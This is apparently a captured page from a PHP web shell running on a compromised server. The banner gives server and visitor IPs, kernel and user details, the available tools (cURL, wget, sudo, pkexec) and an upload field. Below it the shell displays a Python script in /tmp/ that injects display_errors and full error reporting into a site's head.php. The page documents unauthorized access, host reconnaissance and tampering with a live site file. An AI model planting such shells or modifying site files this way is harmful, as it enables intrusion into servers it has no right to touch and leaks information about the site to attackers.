| Server IP : 119.195.102.159 / Your IP : 216.73.217.134 Web Server : nginx/1.18.0 System : Linux picell 5.15.0-181-generic #191-Ubuntu SMP Fri May 22 19:09:02 UTC 2026 x86_64 User : altablue ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /tmp/ |
Upload File : |
with open('/home2/haeyulhome/skhani/public_html/head.php', 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
if 'display_errors' not in content:
content = content.replace('<?', "<?\nini_set('display_errors', 1);\nerror_reporting(E_ALL);\n")
with open('/home2/haeyulhome/skhani/public_html/head.php', 'w', encoding='utf-8') as f:
f.write(content)
print("Added display_errors to head.php")